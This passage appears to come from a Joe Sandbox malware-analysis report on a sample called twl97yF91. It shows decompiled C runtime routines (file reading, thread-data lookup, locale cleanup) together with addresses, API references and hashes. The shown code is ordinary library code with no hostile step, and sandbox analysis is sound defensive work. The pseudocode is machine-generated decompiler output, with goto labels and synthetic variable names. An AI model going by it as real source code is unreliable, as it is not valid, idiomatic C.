                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									do {
                                                                                                                                                                                                          										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                                          										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                          											L24:
                                                                                                                                                                                                          											__eflags = _t120 - _v16;
                                                                                                                                                                                                          											if(_t120 < _v16) {
                                                                                                                                                                                                          												_t97 = E0040FC07(_t120, _t125, _t133);
                                                                                                                                                                                                          												__eflags = _t97 - 0xffffffff;
                                                                                                                                                                                                          												if(_t97 == 0xffffffff) {
                                                                                                                                                                                                          													L48:
                                                                                                                                                                                                          													return (_t131 - _t120) / _a12;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__eflags = _v8;
                                                                                                                                                                                                          												if(_v8 == 0) {
                                                                                                                                                                                                          													L44:
                                                                                                                                                                                                          													__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                          													if(__eflags != 0) {
                                                                                                                                                                                                          														E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                          														_t134 = _t134 + 0xc;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                                          													L4:
                                                                                                                                                                                                          													E0040E744(_t125, _t131, _t133);
                                                                                                                                                                                                          													goto L5;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t123 = _v12;
                                                                                                                                                                                                          												_v12 = _v12 + 1;
                                                                                                                                                                                                          												 *_v12 = _t97;
                                                                                                                                                                                                          												_t120 = _t120 - 1;
                                                                                                                                                                                                          												_t70 =  &_v8;
                                                                                                                                                                                                          												 *_t70 = _v8 - 1;
                                                                                                                                                                                                          												__eflags =  *_t70;
                                                                                                                                                                                                          												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                                          												goto L39;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = _v16;
                                                                                                                                                                                                          											if(_v16 == 0) {
                                                                                                                                                                                                          												_t105 = 0x7fffffff;
                                                                                                                                                                                                          												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                          												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                          													_t105 = _t120;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                          												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                          													_t55 = _t120 % _v16;
                                                                                                                                                                                                          													__eflags = _t55;
                                                                                                                                                                                                          													_t125 = _t55;
                                                                                                                                                                                                          													_t110 = _t120;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t125 = 0x7fffffff % _v16;
                                                                                                                                                                                                          													_t110 = 0x7fffffff;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t105 = _t110 - _t125;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = _t105 - _v8;
                                                                                                                                                                                                          											if(_t105 > _v8) {
                                                                                                                                                                                                          												goto L44;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_push(_t105);
                                                                                                                                                                                                          												_push(_v12);
                                                                                                                                                                                                          												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                                                                                                                                                          												_pop(_t123);
                                                                                                                                                                                                          												_push(_t106);
                                                                                                                                                                                                          												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                                                                                                                                                          												_t134 = _t134 + 0xc;
                                                                                                                                                                                                          												__eflags = _t107;
                                                                                                                                                                                                          												if(_t107 == 0) {
                                                                                                                                                                                                          													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                                                                                                                                                          													goto L48;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__eflags = _t107 - 0xffffffff;
                                                                                                                                                                                                          												if(_t107 == 0xffffffff) {
                                                                                                                                                                                                          													L47:
                                                                                                                                                                                                          													_t80 = _t133 + 0xc;
                                                                                                                                                                                                          													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                                                                                                                                                          													__eflags =  *_t80;
                                                                                                                                                                                                          													goto L48;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_v12 = _v12 + _t107;
                                                                                                                                                                                                          												_t120 = _t120 - _t107;
                                                                                                                                                                                                          												_v8 = _v8 - _t107;
                                                                                                                                                                                                          												goto L39;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t113 =  *(_t133 + 4);
                                                                                                                                                                                                          										__eflags = _t113;
                                                                                                                                                                                                          										if(__eflags == 0) {
                                                                                                                                                                                                          											goto L24;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										if(__eflags < 0) {
                                                                                                                                                                                                          											goto L47;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t131 = _t120;
                                                                                                                                                                                                          										__eflags = _t120 - _t113;
                                                                                                                                                                                                          										if(_t120 >= _t113) {
                                                                                                                                                                                                          											_t131 = _t113;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										__eflags = _t131 - _v8;
                                                                                                                                                                                                          										if(_t131 > _v8) {
                                                                                                                                                                                                          											_t133 = 0;
                                                                                                                                                                                                          											__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                          												E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                          												_t134 = _t134 + 0xc;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t114 = E0040BFC1(__eflags);
                                                                                                                                                                                                          											_push(_t133);
                                                                                                                                                                                                          											_push(_t133);
                                                                                                                                                                                                          											_push(_t133);
                                                                                                                                                                                                          											_push(_t133);
                                                                                                                                                                                                          											 *_t114 = 0x22;
                                                                                                                                                                                                          											_push(_t133);
                                                                                                                                                                                                          											goto L4;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                                                                                                                                                          											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                                                                                                                                                          											 *_t133 =  *_t133 + _t131;
                                                                                                                                                                                                          											_v12 = _v12 + _t131;
                                                                                                                                                                                                          											_t120 = _t120 - _t131;
                                                                                                                                                                                                          											_t134 = _t134 + 0x10;
                                                                                                                                                                                                          											_v8 = _v8 - _t131;
                                                                                                                                                                                                          											_t131 = _v20;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										L39:
                                                                                                                                                                                                          										__eflags = _t120;
                                                                                                                                                                                                          									} while (_t120 != 0);
                                                                                                                                                                                                          									goto L40;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t118 = _t90 | 0xffffffff;
                                                                                                                                                                                                          						_t90 = _t118 / _a12;
                                                                                                                                                                                                          						_t125 = _t118 % _a12;
                                                                                                                                                                                                          						__eflags = _a16 - _t90;
                                                                                                                                                                                                          						if(_a16 <= _t90) {
                                                                                                                                                                                                          							goto L13;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                          					_t92 = E0040BFC1(_t138);
                                                                                                                                                                                                          					_push(_t131);
                                                                                                                                                                                                          					_push(_t131);
                                                                                                                                                                                                          					_push(_t131);
                                                                                                                                                                                                          					_push(_t131);
                                                                                                                                                                                                          					 *_t92 = 0x16;
                                                                                                                                                                                                          					_push(_t131);
                                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}





























                                                                                                                                                                                                          0x0040bd44
                                                                                                                                                                                                          0x0040bd4b
                                                                                                                                                                                                          0x0040bd4e
                                                                                                                                                                                                          0x0040bd50
                                                                                                                                                                                                          0x0040bd5a
                                                                                                                                                                                                          0x0040bd52
                                                                                                                                                                                                          0x0040bd55
                                                                                                                                                                                                          0x0040bd55
                                                                                                                                                                                                          0x0040bd61
                                                                                                                                                                                                          0x0040bd63
                                                                                                                                                                                                          0x0040be53
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bd69
                                                                                                                                                                                                          0x0040bd69
                                                                                                                                                                                                          0x0040bd69
                                                                                                                                                                                                          0x0040bd70
                                                                                                                                                                                                          0x0040bdb6
                                                                                                                                                                                                          0x0040bdb6
                                                                                                                                                                                                          0x0040bdb9
                                                                                                                                                                                                          0x0040be24
                                                                                                                                                                                                          0x0040be2a
                                                                                                                                                                                                          0x0040be2d
                                                                                                                                                                                                          0x0040beb8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bebe
                                                                                                                                                                                                          0x0040be33
                                                                                                                                                                                                          0x0040be37
                                                                                                                                                                                                          0x0040be87
                                                                                                                                                                                                          0x0040be87
                                                                                                                                                                                                          0x0040be8b
                                                                                                                                                                                                          0x0040be95
                                                                                                                                                                                                          0x0040be9a
                                                                                                                                                                                                          0x0040be9a
                                                                                                                                                                                                          0x0040bea2
                                                                                                                                                                                                          0x0040beaa
                                                                                                                                                                                                          0x0040beab
                                                                                                                                                                                                          0x0040beac
                                                                                                                                                                                                          0x0040bead
                                                                                                                                                                                                          0x0040beae
                                                                                                                                                                                                          0x0040bcf9
                                                                                                                                                                                                          0x0040bcf9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bcfe
                                                                                                                                                                                                          0x0040be39
                                                                                                                                                                                                          0x0040be3c
                                                                                                                                                                                                          0x0040be3f
                                                                                                                                                                                                          0x0040be44
                                                                                                                                                                                                          0x0040be45
                                                                                                                                                                                                          0x0040be45
                                                                                                                                                                                                          0x0040be45
                                                                                                                                                                                                          0x0040be48
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040be48
                                                                                                                                                                                                          0x0040bdbb
                                                                                                                                                                                                          0x0040bdbf
                                                                                                                                                                                                          0x0040bde0
                                                                                                                                                                                                          0x0040bde5
                                                                                                                                                                                                          0x0040bde7
                                                                                                                                                                                                          0x0040bde9
                                                                                                                                                                                                          0x0040bde9
                                                                                                                                                                                                          0x0040bdc1
                                                                                                                                                                                                          0x0040bdc8
                                                                                                                                                                                                          0x0040bdca
                                                                                                                                                                                                          0x0040bdd7
                                                                                                                                                                                                          0x0040bdd7
                                                                                                                                                                                                          0x0040bdd7
                                                                                                                                                                                                          0x0040bdda
                                                                                                                                                                                                          0x0040bdcc
                                                                                                                                                                                                          0x0040bdce
                                                                                                                                                                                                          0x0040bdd1
                                                                                                                                                                                                          0x0040bdd1
                                                                                                                                                                                                          0x0040bddc
                                                                                                                                                                                                          0x0040bddc
                                                                                                                                                                                                          0x0040bdeb
                                                                                                                                                                                                          0x0040bdee
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bdf4
                                                                                                                                                                                                          0x0040bdf4
                                                                                                                                                                                                          0x0040bdf5
                                                                                                                                                                                                          0x0040bdf9
                                                                                                                                                                                                          0x0040bdfe
                                                                                                                                                                                                          0x0040bdff
                                                                                                                                                                                                          0x0040be00
                                                                                                                                                                                                          0x0040be05
                                                                                                                                                                                                          0x0040be08
                                                                                                                                                                                                          0x0040be0a
                                                                                                                                                                                                          0x0040bec6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bec6
                                                                                                                                                                                                          0x0040be10
                                                                                                                                                                                                          0x0040be13
                                                                                                                                                                                                          0x0040beb4
                                                                                                                                                                                                          0x0040beb4
                                                                                                                                                                                                          0x0040beb4
                                                                                                                                                                                                          0x0040beb4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040beb4
                                                                                                                                                                                                          0x0040be19
                                                                                                                                                                                                          0x0040be1c
                                                                                                                                                                                                          0x0040be1e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040be1e
                                                                                                                                                                                                          0x0040bdee
                                                                                                                                                                                                          0x0040bd72
                                                                                                                                                                                                          0x0040bd75
                                                                                                                                                                                                          0x0040bd77
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bd79
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bd7f
                                                                                                                                                                                                          0x0040bd81
                                                                                                                                                                                                          0x0040bd83
                                                                                                                                                                                                          0x0040bd85
                                                                                                                                                                                                          0x0040bd85
                                                                                                                                                                                                          0x0040bd87
                                                                                                                                                                                                          0x0040bd8a
                                                                                                                                                                                                          0x0040be5b
                                                                                                                                                                                                          0x0040be5d
                                                                                                                                                                                                          0x0040be61
                                                                                                                                                                                                          0x0040be6a
                                                                                                                                                                                                          0x0040be6f
                                                                                                                                                                                                          0x0040be6f
                                                                                                                                                                                                          0x0040be72
                                                                                                                                                                                                          0x0040be77
                                                                                                                                                                                                          0x0040be78
                                                                                                                                                                                                          0x0040be79
                                                                                                                                                                                                          0x0040be7a
                                                                                                                                                                                                          0x0040be7b
                                                                                                                                                                                                          0x0040be81

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3886058894-0
                                                                                                                                                                                                          • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                          • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __fileno$__getptd_noexit__lock_file
                                                                                                                                                                                                          • String ID: 'B
                                                                                                                                                                                                          • API String ID: 3755561058-2787509829
                                                                                                                                                                                                          • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                          • Instruction ID: e9f5648307d5eb11c25432d8d4ed4fb8796e32f7d6dd83879953aa3e4883119d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F012B73900A145AD2236B786C416FD73A19ECEB72F65470AE0709B2D0EB28C742ED55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __getptd.LIBCMT ref: 02CC49AB
                                                                                                                                                                                                            • Part of subcall function 02CC099C: __getptd_noexit.LIBCMT ref: 02CC099F
                                                                                                                                                                                                            • Part of subcall function 02CC099C: __amsg_exit.LIBCMT ref: 02CC09AC
                                                                                                                                                                                                          • __getptd.LIBCMT ref: 02CC49C2
                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 02CC49D0
                                                                                                                                                                                                          • __lock.LIBCMT ref: 02CC49E0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                          • String ID: @.B
                                                                                                                                                                                                          • API String ID: 3521780317-470711618
                                                                                                                                                                                                          • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                          • Instruction ID: 5854e92c216c6ff1dc6fe3b9ff4584612a5e9b9e8f34f4b373f3ae62281340e2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39F02431A40B20DBDB3DFBB088007D973A57F00B21FA0855EC444A72D0CB70A901EF55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                          			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                          				signed int _t13;
                                                                                                                                                                                                          				intOrPtr _t28;
                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t30 = __eflags;
                                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                                          				_t25 = __edx;
                                                                                                                                                                                                          				_t22 = __ebx;
                                                                                                                                                                                                          				_push(0xc);
                                                                                                                                                                                                          				_push(0x4214d0);
                                                                                                                                                                                                          				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                          				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                                                                                                                                                                          				_t13 =  *0x422e34; // 0xfffffffe
                                                                                                                                                                                                          				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                          					E0040D6E0(_t22, 0xc);
                                                                                                                                                                                                          					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                                                                          					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                                                                          					_t26 =  *0x422f18; // 0x422e40
                                                                                                                                                                                                          					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                                                                                                                                                                          					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                                                                          					E004147A2();
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                                                                          					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t28 == 0) {
                                                                                                                                                                                                          					E0040E79A(_t25, _t26, 0x20);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E0040E21D(_t28);
                                                                                                                                                                                                          			}







                                                                                                                                                                                                          0x00414759
                                                                                                                                                                                                          0x00414765
                                                                                                                                                                                                          0x00414769
                                                                                                                                                                                                          0x0041476e
                                                                                                                                                                                                          0x00414776

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                                                          • __lock.LIBCMT ref: 00414779
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                          • String ID: @.B
                                                                                                                                                                                                          • API String ID: 3521780317-470711618
                                                                                                                                                                                                          • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                          • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ___addlocaleref.LIBCMT ref: 02CC4973
                                                                                                                                                                                                          • ___removelocaleref.LIBCMT ref: 02CC497E
                                                                                                                                                                                                          • ___freetlocinfo.LIBCMT ref: 02CC4992
                                                                                                                                                                                                            • Part of subcall function 02CC46F0: ___free_lconv_mon.LIBCMT ref: 02CC4736
                                                                                                                                                                                                            • Part of subcall function 02CC46F0: ___free_lconv_num.LIBCMT ref: 02CC4757
                                                                                                                                                                                                            • Part of subcall function 02CC46F0: ___free_lc_time.LIBCMT ref: 02CC47DC
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                                                                                                                                                                          • String ID: @.B$@.B
                                                                                                                                                                                                          • API String ID: 4212647719-183327057
                                                                                                                                                                                                          • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                                                                                          • Instruction ID: 022614c4773af6e6237063324c9698d488f7a062322c04ccec85624b1a0adf1b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6E02632521A3105CA3D3B1C783036A929E2FE2316B3B912EE84CE7044DB244A80D4A4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                          			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                          				intOrPtr _t19;
                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                          				signed int _t22;
                                                                                                                                                                                                          				intOrPtr* _t27;
                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                          				intOrPtr _t40;
                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t37 = __edx;
                                                                                                                                                                                                          				_push(8);
                                                                                                                                                                                                          				_push(0x421140);
                                                                                                                                                                                                          				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                          				_t39 = _a4;
                                                                                                                                                                                                          				_t50 = _t39;
                                                                                                                                                                                                          				_t51 = _t50 != 0;
                                                                                                                                                                                                          				if(_t50 != 0) {
                                                                                                                                                                                                          					E0040FB29(_t39);
                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                          					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                                                                                                                                                          					_t16 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                          					__eflags = _t16 - 0xffffffff;
                                                                                                                                                                                                          					if(_t16 == 0xffffffff) {
                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                          						_t17 = 0x4227e0;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t21 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                          						__eflags = _t21 - 0xfffffffe;
                                                                                                                                                                                                          						if(_t21 == 0xfffffffe) {
                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t22 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                          							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t9 = _t17 + 4; // 0xa80
                                                                                                                                                                                                          					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                                                                                                                                                          					_v8 = 0xfffffffe;
                                                                                                                                                                                                          					E0040C735(_t39);
                                                                                                                                                                                                          					_t19 = 0;
                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t27 = E0040BFC1(_t51);
                                                                                                                                                                                                          					_t40 = 0x16;
                                                                                                                                                                                                          					 *_t27 = _t40;
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					E0040E744(__edx, _t40, 0);
                                                                                                                                                                                                          					_t19 = _t40;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E0040E21D(_t19);
                                                                                                                                                                                                          			}













                                                                                                                                                                                                          0x0040c714
                                                                                                                                                                                                          0x0040c71b
                                                                                                                                                                                                          0x0040c71e
                                                                                                                                                                                                          0x0040c725
                                                                                                                                                                                                          0x0040c72a
                                                                                                                                                                                                          0x0040c72a
                                                                                                                                                                                                          0x0040c6ac
                                                                                                                                                                                                          0x0040c6ac
                                                                                                                                                                                                          0x0040c6b3
                                                                                                                                                                                                          0x0040c6b4
                                                                                                                                                                                                          0x0040c6b6
                                                                                                                                                                                                          0x0040c6b7
                                                                                                                                                                                                          0x0040c6b8
                                                                                                                                                                                                          0x0040c6b9
                                                                                                                                                                                                          0x0040c6ba
                                                                                                                                                                                                          0x0040c6bb
                                                                                                                                                                                                          0x0040c6c3
                                                                                                                                                                                                          0x0040c6c3
                                                                                                                                                                                                          0x0040c731

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                                          • String ID:
